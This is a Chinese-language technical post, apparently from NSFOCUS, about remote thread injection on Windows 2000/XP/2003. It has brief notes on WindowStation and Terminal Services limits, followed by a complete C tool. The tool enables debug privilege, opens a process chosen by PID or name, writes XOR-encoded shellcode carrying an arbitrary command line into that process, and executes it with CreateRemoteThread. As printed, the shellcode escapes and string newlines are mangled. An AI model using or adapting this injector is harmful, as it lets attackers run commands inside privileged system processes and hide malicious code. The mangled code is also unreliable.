前段时间写<<exploit系列(6)--x86/Windows平台上的缓冲区溢出>>,其间涉及远程
线程注入,想到本篇,返回来补充一点内容。sysproc_now.c并不具备良好的可移植
性,为了区分2000/XP/2003,被迫用GetVersionEx()做精确的OS版本判断。相较之下
远程线程注入更易移植些。 如果试图向winlogon.exe进行远程线程注入,编程时需要指定恰当的WindowStation,
否则可能无法与派生的子进程正常交互。
在MSDN中查看GetProcessWindowStation、GetUserObjectInformation等相关函数。
参看Inside 2K([7])第五章的"Interactive Services"小节。
使用终端服务测试CreateRemoteThread_1.c时,可能得到如下错误信息:
"CreateRemoteThread() failed: 存储空间不足,无法处理此命令"
在主控台上测试则一切正常。开始以为是WindowStation的问题,转而动态获取其名
称,错误信息依旧。后来才想起MSDN中有如下信息:
Terminal Services isolates each terminal session by design. Therefore,
CreateRemoteThread fails if the target process is in a different session
than the calling process.
暂不清楚是否有办法解决,如果没有办法解决,那sysproc_now.c还有存在的必要。
--------------------------------------------------------------------------
/*
* Copyright (C) 2002, 2012
* The NSFOCUS INFORMATION TECHNOLOGY CO.,LTD.
* -----------------------------------------------------------------------
* Author : NSFocus Security Team <security@nsfocus.com>
* : http://www.nsfocus.com
* Maintain : scz <scz@nsfocus.com>
* Version : 2.02
* Compile : For x86/EWindows XP SP1 & VC 7
* : cl CreateRemoteThread_1.c /nologo /Os /G6 /Gs65536 /W3 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /MT /link /RELEASE
* :
* Create : 2003-10-08 13:37
* Modify : 2003-10-08 17:02
* -----------------------------------------------------------------------
* The only thing they can"t take from us are our minds. !H
*/
/************************************************************************
* *
* Head File *
* *
************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
/************************************************************************
* *
* Macro *
* *
************************************************************************/
#pragma comment( linker, "/INCREMENTAL:NO" )
#pragma comment( linker, "/subsystem:console" )
#pragma comment( lib, "kernel32.lib" )
#pragma comment( lib, "advapi32.lib" )
#define VERSION "2.02"
#define MAXBUFLEN 8192
#define CHARBASE "A"
#define CHARESCAPE "_"
#define CHARXOR "^"
typedef LONG NTSTATUS;
#define NT_SUCCESS(status) ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
typedef LONG KPRIORITY;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemProcessesAndThreadsInformation = 5
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
typedef ULONG ( __stdcall *RTLNTSTATUSTODOSERROR ) ( IN NTSTATUS Status );
typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) ( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL );
/************************************************************************
* *
* Function Prototype *
* *
************************************************************************/
static size_t bufencode
(
unsigned char *src,
unsigned char *dst,
size_t srclen
);
static BOOL DisableCurrentProcessDebugPrivilege
(
void
);
static BOOL EnableCurrentProcessDebugPrivilege
(
void
);
static DWORD GetPidFromProcessName
(
wchar_t *ProcessName
);
static BOOL LocateNtdllEntry
(
void
);
static DWORD __stdcall PnameToPid
(
char *ProcessName
);
static void PrintWin32ErrorCUI
(
char *message,
DWORD dwMessageId
);
static void PrintZwErrorCUI
(
char *message,
NTSTATUS status
);
static BOOL SetCurrentProcessPrivilege
(
LPCTSTR PrivilegeName,
BOOL EnableFlag
);
static BOOL SetPrivilege
(
HANDLE TokenHandle,
LPCTSTR PrivilegeName,
BOOL EnableFlag
);
static void usage
(
char *arg
);
/************************************************************************
* *
* Static Global Var *
* *
************************************************************************/
static RTLNTSTATUSTODOSERROR RtlNtStatusToDosError = NULL;
static ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
static unsigned char code[] =
"xEBx19x5Ex8BxFEx33xD2xFCxACx3AxC2x74x13x3Cx5Fx74"
"x05x34x5ExAAxEBxF2xACx2Cx41xEBxF6xE8xE2xFFxFFxFF"
"xB7x8Fx5FxA0x5Ex5Ex0BxD5xB2x0FxDDx3BxA2x5ExD5x1B"
"x56x51xE0x5ExDBx9Ex2Ax7CxD5x1BxA2x9FxBEx5BxD5x13"
"xA2x9FxB7x45x55x9FxD5x13x56x51xE0x57x5Dx9FxD7x1B"
"xA2xD5x1Bx56x1ExD7x1Bx56xB5x8AxD5x1BxA2x97x9Cx5A"
"x5Ex0BxD5xB2xDDxB2x06x34x1AxD3x1BxF6x0ExB6xBDx5E"
"x5Ex5Ex99x1BxF6x1Ax5Ex5Ex5Ex99x1Bx8Ax5FxA0x5Ex5E"
"x5ExD5x1Bx4ExD7x1BxEEx38x99x1Bx86x5FxA0x5ExA1x2B"
"x4ExB6xCFx5Ex5Ex5ExD5x13x4ExD3x1Ax5FxA0x5FxA0xD7"
"x1Bx4ExD3x1BxAEx0ExD3x1BxF6x0Ex34x5Ex34x5Ex36x4E"
"x5Cx5Ex5Ex34x5FxA0x34x5Ex34x5ExA1x2Bx4Ex34x5ExA1"
"x0Bx56xDBx9Ex2Ax52xA1x2BxAAxA1x0Bx52xA1x2BxAExA1"
"x0Bx52x97x9Cx52x5Ex0BxD5xB2x0Fx0FxD5x1Bx42xD7x1B"
"xA6xDDx3BxA2x5ExB5x59xD5x1BxA2x1ExD7x1BxA2xD5x1B"
"xA2x65x1Bx7Ex2Dx73xD5x1BxA6xA1x6ExA1x2Bx46xA1x2B"
"x4AxA1x2Bx4ExA1x2Bx52xA1x2Bx56xB6x29x5Ex5Ex5ExD5"
"x13xA2xD5x0Bx7AxD7x5AxD4xD5x1BxA6xDDx9Ex5AxD7x1B"
"xA6xB5x9AxD5x1BxA6x97x9Cx7Ex5Ex0BxD5xB2x0Fx0FxDD"
"x3BxA6x5ExD5x1Bx56xD7x1BxA2xD5x1BxA2x51xE0x5ExD5"
"x13xA2x1FxD7x13xA2xDBx9Ex2Ax57xD5x1BxA6x1ExD7x1B"
"xA6xB5xB8xD5x1BxA6x97x9Cx5Ax5Ex0BxD5xB2x0FxDDx3B"
"xA2x5ExB5x59xD5x1BxA2x1ExD7x1BxA2xD5x1BxA2x65x1B"
"x52x2Dx51xD5x1Bx56xDEx7Ex5ExD5x1Bx56x1ExD7x1Bx56"
"xB5xBCx97x9Cx56x5Ex0BxD5xB2xDDxB2x4ExDDx3BxA6x5E"
"xDDx3BxA2x5ExDDx3BxAAx5ExDDx3BxAEx5ExDDx3BxA6x5E"
"xB5x59xD5x1BxA6x1ExD7x1BxA6xD5x1BxA6x65x1Bx46x2D"
"x1BxD5x1BxA6xD5x13x4ExD5x0Bx56x5Dx4AxDFxD7x0BxAA"
"xA1x2BxAAxB6x3DxA0xA1xA1xD7x1BxA2xD5x1BxA2x65x1B"
"x42x2Bx7FxD5x1BxA6xD5x13x4Ax51xE9x5Ax1FxD7x1BxA6"
"xD5x1BxA6xD5x13x52xD5x0Bx56x5Dx4AxDFxD7x0BxAExD5"
"x1BxAExB5x5AxB5xF2x6Dx9Ex97x9Cx46x5Ex0BxD5xB2xDD"
"xB2x66xDDx3BxB2x5ExDDx3BxA2x5ExDDx3BxBEx5ExDDx3B"
"x8Ax5ExDDx3Bx86x5ExDDx3BxAEx5ExDDx3BxAAx5ExDDx3B"
"x82x5ExDDx3BxA6x5ExDDx3Bx96x5ExDDx3BxB6x5ExDDx3B"
"xBAx5ExB7xEFx5Ex5Ex5ExD1x1BxBAxE6xB7xDCx1Ex5Ex73"
"xB9xDCx1Ex5Ex5FxA0x1BxBAx3AxFFx6Ex5Ex5Ex5ExD7x1B"
"xB2xD5x1BxB2xD5x1Ex52xD7x1BxA2xD5x1BxA2xD5x1Ex42"
"xD7x1BxBExD5x1BxBExD5x5ExD7x1BxBExD5x1BxBExD5x1E"
"x56xD7x1Bx8AxD5x1Bx8AxD5x1Ex62xD7x1BxB6xD5x1Bx8A"
"x5Dx1BxB6xD5x13x8Ax5Dx16x26xD7x13x86xD5x1Bx86xD5"
"x1Ex46xD7x1BxAExD5x1Bx86xD5x1Ex42x5Dx1Bx8AxD7x1B"
"xAAxD5x1Bx86xD5x1Ex7Ex5Dx1Bx8AxD7x1Bx82xD5x1Bx86"
"xD5x1Ex7Ax5Dx1Bx8AxD7x1Bx96xD3x1Bx92x0Ex34x5CxA1"
"x2BxBAxA1x2BxAExA1x2Bx96xA1x2Bx82xA1x2BxAAxA1x2B"
"x8AxB6x5FxA0xA0xA1xA1xD7x1BxBAxA1x2BxBAxA1x2Bx8E"
"xA1x2Bx92xB6xDExA3xA1xA1xB5x5BxB6x14xA1xA1xA1x97"
"x9Dx95x1Cx29xE6xC8xCEx3Cx89x09x37x30x0Dx2Ax3Fx6E"
"x02x1Ax3Bx38x3Fx2Bx32x2Ax5E";
/************************************************************************/
static size_t bufencode ( unsigned char *src, unsigned char *dst, size_t srclen )
{
unsigned char c;
size_t i, j;
for ( i = 0, j = 0; i < srclen; i++, j++ )
{
dst[j] = src[i] ^ CHARXOR;
c = dst[j];
if ( 0x00 == c || CHARESCAPE == c )
{
dst[j] = CHARESCAPE;
j++;
dst[j] = c + CHARBASE;
}
}
return( j );
} /* end of bufencode */
static BOOL DisableCurrentProcessDebugPrivilege ( void )
{
return( SetCurrentProcessPrivilege( SE_DEBUG_NAME, FALSE ) );
} /* end of DisableCurrentProcessDebugPrivilege */
static BOOL EnableCurrentProcessDebugPrivilege ( void )
{
return( SetCurrentProcessPrivilege( SE_DEBUG_NAME, TRUE ) );
} /* end of EnableCurrentProcessDebugPrivilege */
static DWORD GetPidFromProcessName ( wchar_t *ProcessName )
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
PSYSTEM_PROCESSES proc = NULL;
ULONG delta = 0;
DWORD pid = 0;
for ( size = 1; ; size *= 2 )
{
if ( NULL == ( buf = calloc( size, 1 ) ) )
{
fprintf( stderr, "calloc( %u, 1 ) failed
", size );
goto GetPidFromProcessName_exit;
}
status = ZwQuerySystemInformation( SystemProcessesAndThreadsInformation, buf, size, NULL );
if ( !NT_SUCCESS( status ) )
{
if ( STATUS_INFO_LENGTH_MISMATCH == status )
{
free( buf );
buf = NULL;
}
else
{
PrintZwErrorCUI( "ZwQuerySystemInformation() failed", status );
goto GetPidFromProcessName_exit;
}
}
else
{
break;
}
} /* end of for */
proc = ( PSYSTEM_PROCESSES )buf;
do
{
if ( NULL != proc->ProcessName.Buffer )
{
if ( 0 == _wcsicmp( ProcessName, proc->ProcessName.Buffer ) )
{
pid = proc->ProcessId;
break;
}
}
delta = proc->NextEntryDelta;
proc = ( PSYSTEM_PROCESSES )( ( char * )proc + delta );
}
while ( 0 != delta );
GetPidFromProcessName_exit:
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
return( pid );
} /* end of GetPidFromProcessName */
static BOOL LocateNtdllEntry ( void )
{
BOOL ret = FALSE;
char NTDLL_DLL[] = "ntdll.dll";
HMODULE ntdll_dll = NULL;
if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
{
PrintWin32ErrorCUI( "GetModuleHandle() failed", GetLastError() );
return( ret );
}
if ( !( RtlNtStatusToDosError = ( RTLNTSTATUSTODOSERROR )GetProcAddress
(
ntdll_dll,
"RtlNtStatusToDosError"
) ) )
{
goto LocateNtdllEntry_exit;
}
if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress
(
ntdll_dll,
"ZwQuerySystemInformation"
) ) )
{
goto LocateNtdllEntry_exit;
}
ret = TRUE;
LocateNtdllEntry_exit:
if ( FALSE == ret )
{
PrintWin32ErrorCUI( "GetProcAddress() failed", GetLastError() );
}
ntdll_dll = NULL;
return( ret );
} /* end of LocateNtdllEntry */
static DWORD __stdcall PnameToPid ( char *ProcessName )
{
int i;
WCHAR *ProcessNameW = NULL;
DWORD Pid = 0;
i = MultiByteToWideChar
(
CP_ACP,
0,
ProcessName,
( int )( strlen( ProcessName ) + 1 ),
NULL,
0
);
if ( 0 == i )
{
PrintWin32ErrorCUI( "MultiByteToWideChar() failed [0]", GetLastError() );
goto InjectCodeToProcessByName_exit;
}
ProcessNameW = ( WCHAR * )HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, i * sizeof( WCHAR ) );
if ( NULL == ProcessNameW )
{
PrintWin32ErrorCUI( "HeapAlloc() failed", ERROR_NOT_ENOUGH_MEMORY );
goto InjectCodeToProcessByName_exit;
}
if ( 0 == MultiByteToWideChar
(
CP_ACP,
0,
ProcessName,
( int )( strlen( ProcessName ) + 1 ),
ProcessNameW,
i
) )
{
PrintWin32ErrorCUI( "MultiByteToWideChar() failed [1]", GetLastError() );
goto InjectCodeToProcessByName_exit;
}
wprintf( L"%s
", ProcessNameW );
if ( 0 == ( Pid = GetPidFromProcessName( ProcessNameW ) ) )
{
fprintf( stderr, "GetPidFromProcessName() failed
" );
goto InjectCodeToProcessByName_exit;
}
InjectCodeToProcessByName_exit:
if ( NULL != ProcessNameW )
{
HeapFree( GetProcessHeap(), 0, ProcessNameW );
ProcessNameW = NULL;
}
return( Pid );
} /* end of PnameToPid */
static void PrintWin32ErrorCUI ( char *message, DWORD dwMessageId )
{
char *errMsg;
FormatMessage
(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
dwMessageId,
MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
( LPTSTR )&errMsg,
0,
NULL
);
fprintf( stderr, "%s: %s", message, errMsg );
LocalFree( errMsg );
return;
} /* end of PrintWin32ErrorCUI */
static void PrintZwErrorCUI ( char *message, NTSTATUS status )
{
char *errMsg;
FormatMessage
(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
RtlNtStatusToDosError( status ),
MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
( LPTSTR )&errMsg,
0,
NULL
);
fprintf( stderr, "%s: %s", message, errMsg );
LocalFree( errMsg );
return;
} /* end of PrintZwErrorCUI */
static BOOL SetCurrentProcessPrivilege ( LPCTSTR PrivilegeName, BOOL EnableFlag )
{
HANDLE TokenHandle = ( HANDLE )-1;
BOOL ret = TRUE;
if ( FALSE == OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &TokenHandle ) )
{
PrintWin32ErrorCUI( "OpenProcessToken() failed", GetLastError() );
ret = FALSE;
goto SetCurrentProcessPrivilege_exit;
}
ret = SetPrivilege( TokenHandle, PrivilegeName, EnableFlag );
SetCurrentProcessPrivilege_exit:
if ( TokenHandle != ( HANDLE )-1 )
{
CloseHandle( TokenHandle );
TokenHandle = ( HANDLE )-1;
}
return( ret );
} /* end of SetCurrentProcessPrivilege */
static BOOL SetPrivilege ( HANDLE TokenHandle, LPCTSTR PrivilegeName, BOOL EnableFlag )
{
DWORD error;
BOOL ret = FALSE;
TOKEN_PRIVILEGES tp =
{
1,
{
{ { 0, 0 }, 0 }
}
};
if ( TRUE == EnableFlag )
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
if ( FALSE == LookupPrivilegeValue( NULL, PrivilegeName, &tp.Privileges[0].Luid ) )
{
PrintWin32ErrorCUI( "LookupPrivilegeValue() failed", GetLastError() );
goto SetPrivilege_exit;
}
if ( FALSE == AdjustTokenPrivileges( TokenHandle, FALSE, &tp, sizeof( tp ), NULL, NULL ) )
{
PrintWin32ErrorCUI( "AdjustTokenPrivileges() failed", GetLastError() );
goto SetPrivilege_exit;
}
else
{
error = GetLastError();
if ( ERROR_SUCCESS != error )
{
PrintWin32ErrorCUI( "AdjustTokenPrivileges() failed", error );
goto SetPrivilege_exit;
}
}
ret = TRUE;
SetPrivilege_exit:
return( ret );
} /* end of SetPrivilege */
static void usage ( char *arg )
{
fprintf
(
stderr,
"Usage: %s [-h] [-v] [-c cmdline] [-p pid] [-q pname]
",
arg
);
exit( EXIT_FAILURE );
} /* end of usage */
int __cdecl main ( int argc, char * argv[] )
{
int ret = EXIT_FAILURE,
c;
HANDLE hProcess = NULL,
hThread = NULL;
char *cmdline = NULL;
DWORD pid = 0;
char *pname = NULL;
LPVOID remotebuf = NULL;
unsigned char buf[MAXBUFLEN];
size_t j;
if ( 1 == argc )
{
usage( argv[0] );
}
for ( c = 1; c < argc; c++ )
{
if ( ( ( argv[c][0] != "-" ) && ( argv[c][0] != "/" ) ) || ( strlen( argv[c] ) < 2 ) )
{
usage( argv[0] );
}
else
{
switch ( tolower( argv[c][1] ) )
{
case "c":
if ( ( c + 1 ) >= argc )
{
usage( argv[0] );
}
cmdline = argv[++c];
break;
case "p":
if ( ( c + 1 ) >= argc )
{
usage( argv[0] );
}
pid = ( DWORD )strtoul( argv[++c], NULL, 0 );
break;
case "q":
if ( ( c + 1 ) >= argc )
{
usage( argv[0] );
}
pname = argv[++c];
break;
case "v":
fprintf( stderr, "%s ver "VERSION"
", argv[0] );
return( EXIT_SUCCESS );
case "h":
case "?":
default:
usage( argv[0] );
break;
} /* end of switch */
}
} /* end of for */
if ( NULL == cmdline )
{
fprintf( stderr, "Checking your [-c cmdline]
" );
return( ret );
}
if ( 0 == pid && NULL == pname )
{
fprintf( stderr, "Checking your [-p pid] [-q pname]
" );
return( ret );
}
EnableCurrentProcessDebugPrivilege();
ZeroMemory( buf, sizeof( buf ) );
j = strlen( code );
memcpy( buf, code, j );
j += bufencode( cmdline, buf + j, strlen( cmdline ) + 1 ) + 1;
if ( FALSE == LocateNtdllEntry() )
{
fprintf( stderr, "LocateNtdllEntry() failed
" );
goto main_exit;
}
if ( NULL != pname )
{
pid = PnameToPid( pname );
}
if ( 0 == pid )
{
fprintf( stderr, "Checking your [-p pid] [-q pname]
" );
goto main_exit;
}
else
{
printf( "pid = %u
", pid );
}
hProcess = OpenProcess
(
PROCESS_CREATE_THREAD |
PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION |
PROCESS_VM_READ |
PROCESS_VM_WRITE,
FALSE,
pid
);
if ( NULL == hProcess )
{
PrintWin32ErrorCUI( "OpenProcess() failed", GetLastError() );
goto main_exit;
}
remotebuf = VirtualAllocEx
(
hProcess,
NULL,
j,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);
if ( NULL == remotebuf )
{
PrintWin32ErrorCUI( "VirtualAllocEx() failed", GetLastError() );
goto main_exit;
}
if ( 0 == WriteProcessMemory
(
hProcess,
remotebuf,
buf,
j,
NULL
) )
{
PrintWin32ErrorCUI( "WriteProcessMemory() failed", GetLastError() );
goto main_exit;
}
hThread = CreateRemoteThread
(
hProcess,
NULL,
0,
( LPTHREAD_START_ROUTINE )remotebuf,
NULL,
0,
NULL
);
if ( NULL == hThread )
{
PrintWin32ErrorCUI( "CreateRemoteThread() failed", GetLastError() );
goto main_exit;
}
if ( WAIT_FAILED == WaitForSingleObject( hThread, INFINITE ) )
{
PrintWin32ErrorCUI( "WaitForSingleObject() failed", GetLastError() );
goto main_exit;
}
printf( "
You should see this message
" );
ret = EXIT_SUCCESS;
main_exit:
if ( NULL != hThread )
{
CloseHandle( hThread );
hThread = NULL;
}
if ( NULL != hProcess )
{
if ( NULL != remotebuf )
{
VirtualFreeEx( hProcess, remotebuf, 0, MEM_RELEASE );
remotebuf = NULL;
}
CloseHandle( hProcess );
hProcess = NULL;
}
DisableCurrentProcessDebugPrivilege();
return( ret );
} /* end of main */
/************************************************************************/
源代码网整理以下
